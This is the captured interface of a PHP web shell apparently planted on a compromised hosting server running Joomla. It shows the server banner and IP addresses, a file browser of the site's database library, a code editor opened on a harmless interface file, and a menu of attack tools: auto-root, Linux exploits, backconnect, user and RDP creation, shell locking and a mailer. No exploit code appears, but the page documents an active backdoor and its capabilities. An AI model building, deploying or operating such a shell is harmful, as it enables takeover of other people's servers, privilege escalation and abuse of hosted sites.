Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
libraries /
joomla /
database /
[ HOME SHELL ]
Name
Size
Permission
Action
driver
[ DIR ]
drwxr-xr-x
exception
[ DIR ]
drwxr-xr-x
exporter
[ DIR ]
drwxr-xr-x
importer
[ DIR ]
drwxr-xr-x
iterator
[ DIR ]
drwxr-xr-x
query
[ DIR ]
drwxr-xr-x
database.php
5
KB
-rw-r--r--
driver.php
55.07
KB
-rw----r--
exporter.php
4.41
KB
-rw-r--r--
factory.php
5.35
KB
-rw-r--r--
importer.php
4.86
KB
-rw----r--
interface.php
551
B
-rw-r--r--
iterator.php
3.65
KB
-rw-r--r--
query.php
44.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : interface.php
<?php /** * @package Joomla.Platform * @subpackage Database * * @copyright Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE */ defined('JPATH_PLATFORM') or die; /** * Joomla Platform Database Interface * * @since 1.7.0 */ interface JDatabaseInterface { /** * Test to see if the connector is available. * * @return boolean True on success, false otherwise. * * @since 1.7.0 */ public static function isSupported(); }
Close